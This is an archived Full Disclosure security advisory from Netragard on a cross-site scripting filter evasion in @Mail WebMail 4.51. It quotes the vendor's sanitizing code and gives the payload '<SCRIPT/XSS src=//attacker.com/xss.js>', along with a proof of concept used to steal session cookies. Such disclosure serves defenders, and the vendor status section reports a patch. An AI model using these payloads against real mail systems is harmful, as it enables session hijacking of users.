Full Disclosure mailing list archives
[NETRAGARD-20061220 SECURITY ADVISORY] [@Mail WebMail Cross Site Scripting Vulnerabilitity]
From: Netragard Security Advisories <advisories () netragard com>
Date: Thu, 21 Dec 2006 11:46:53 -0500
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ******************** Netragard, L.L.C Advisory* ******************* Strategic Reconnaissance Team ------------------------------------------------ http://www.netragard.com -- "We make I.T. Safe." [POSTING NOTICE] - ---------------------------------------------------------------------- If you intend to post this advisory on your web page please create a clickable link back to the original Netragard advisory as the contents of the advisory may be updated. <a href=http://www.netragard.com/html/recent_research.html> Netragard Research </a> [About Netragard] - ---------------------------------------------------------------------- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Advisory Information] - ---------------------------------------------------------------------- Contact : Adriel T. Desautels Researcher : Philippe C. Caturegli Advisory ID : NETRAGARD-20061206 Product Name : @ Mail Product Version : 4.51 Vendor Name : Calacode Type of Vulnerability : XSS with filter evasion technique. Effort : Easy - ---------------------------------------------------------------------- Netragard Security Note: Source code obfuscation does not reduce the risk profile of any application as it has no impact on vulnerabilities that might exist within a particular application. @Mail code was obfuscated using basic obfuscation techniques. [Product Description] - ---------------------------------------------------------------------- "@Mail is a feature rich Email Solution, providing a complete WebMail interface for accessing email-resources via a web-browser or wireless device." - --http://www.atmail.com-- [Technical Summary] - ---------------------------------------------------------------------- @Mail does not properly sanitize email. While @Mail does pre-append a <DEFANGED_ tag to detected HTML tags, it does not properly detect <SCRIPT/XSS> tags. This failure makes @Mail vulnerable to Cross-site Scripting Attacks ("XSS") via filter evasion. [Technical Details] - ---------------------------------------------------------------------- @Mail renders HTML emails by default. (Note: we did not find a way to disable this feature.) The emails that are received are parsed by the following code located in Global.pm which disarms basic XSS attacks. - -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<------- my ( $I1I11I11I11IIIII, $I1I111I1111II1II );$_ = $I1111II1II1II1II->II1II1I11IIII111($I1I1II1II1I11II1);if (/</) {s/<(META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY)(\s|>)/<DEFANGED_$1$2/gi; s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp| Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit| Unload)/DEFANGED_On$1/gi; }if (/["\047][^"\047\s]*&#x?[1-9][0-9a-f]/i) {while ( /["\047][^"\047\s]*&#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/ ) {$I1I111I1111II1II = chr($1);s/&#$1;?/$I1I111I1111II1II/g; }while ( /["\047][^"\047\s]*&#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i ) {$I1I111I1111II1II = chr( hex("0$1") );s/&#$1;?/$I1I111I1111II1II/gi; - -------8<------- SNIP Global.pm line 626 -> 635 SNIP -------8<------- The above code will replace <SCRIPT> with <DEFANGED_SCRIPT>, but the security created by the filtering process can be defeated. This is because most web browsers assume that non-alpha-non-digit characters are invalid after an HTML keyword and as such they are treated as white-space. An attacker can use this knowledge to attack @Mail users. Example: "\s" matches any white space character (space and tab, as well as \n and \r characters). "<SCRIPT>" is defanged by the above sanitization however "<SCRIPT/XSS>" is not. When "<SCRIPT/XSS>" hits a web browser it is translated back into "<SCRIPT>" and executed by the browser. the "/XSS" becomes whitespace to the browser. This is a very common filter evasion technique. The following code "<SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>" will then be executed when rendering an email with @Mail Webmail. Please note that the email parser will also replace http:// by a <a href=..., breaking up our XSS attack, but most browser will resolve "//" as "http://" in script tags (verified in IE and Firefox) This XSS attack will allow the attacker to retrieve the victim cookie and impersonate the victime by replacing the sessionID in his own cookie (verified) [Proof Of Concept] - ---------------------------------------------------------------------- Send an HTML email to an @Mail user with the following code embedded. <SCRIPT/XSS src=//www.netragard.com/xss.js></SCRIPT> *** The code above will display an alert if vulnerable *** Note: Netragard's Strategic Reconnaissance Team was able to use this issue to hijack an @Mail users session. [Vendor Status] - ---------------------------------------------------------------------- Vendor Notified on 12/06/06 Vendor responded after 2 more notification attempts Vendor issued a patch. Vendor Comments (below): "Just to confirm the first advisery you sent, NETRAGARD-20061206, has already been fixed and included in the recent @Mail 4.61 patch for clients." [Disclaimer] - ---------------------http://www.netragard.com------------------------- Netragard, L.L.C. assumes no liability for the use of the information provided in this advisory. This advisory was released in an effort to help the I.T. community protect themselves against a potentially dangerous security hole. This advisory is not an attempt to solicit business. <a href="http://www.netragard.com> http://www.netragard.com </a> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (Darwin) iD8DBQFFirpEQwbn1P9Iaa0RAgp9AJ9ZmgNbMZVwsnxoCnWPODqlP2s7/gCbBoHK omIwSA7xolFDZTq8ytPdDiw= =B9c7 -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [NETRAGARD-20061220 SECURITY ADVISORY] [@Mail WebMail Cross Site Scripting Vulnerabilitity] Netragard Security Advisories (Dec 21)